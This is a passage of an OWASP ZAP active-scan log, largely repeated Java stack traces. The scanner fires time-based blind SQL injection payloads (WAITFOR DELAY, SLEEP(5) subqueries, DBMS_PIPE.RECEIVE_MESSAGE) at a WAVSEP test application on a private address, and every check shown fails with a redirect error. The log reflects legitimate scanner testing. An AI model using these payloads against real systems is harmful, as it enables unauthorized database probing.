org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682104 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682105 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))ZvLK)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;(SELECT * FROM (SELECT(SLEEP(5)))ZvLK)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682105 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682106 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');(SELECT * FROM (SELECT(SLEEP(5)))pXgh)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');(SELECT * FROM (SELECT(SLEEP(5)))pXgh)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682106 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682107 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';(SELECT * FROM (SELECT(SLEEP(5)))JIIw)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';(SELECT * FROM (SELECT(SLEEP(5)))JIIw)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682108 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682108 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682109 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(90)||CHR(75),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(90)||CHR(75),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682110 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(98)||CHR(71)||CHR(83),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(98)||CHR(71)||CHR(83),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682111 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(100)||CHR(80)||CHR(104),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(100)||CHR(80)||CHR(104),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682112 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(110)||CHR(105)||CHR(101),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(110)||CHR(105)||CHR(101),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682113 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(118)||CHR(69)||CHR(105),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT 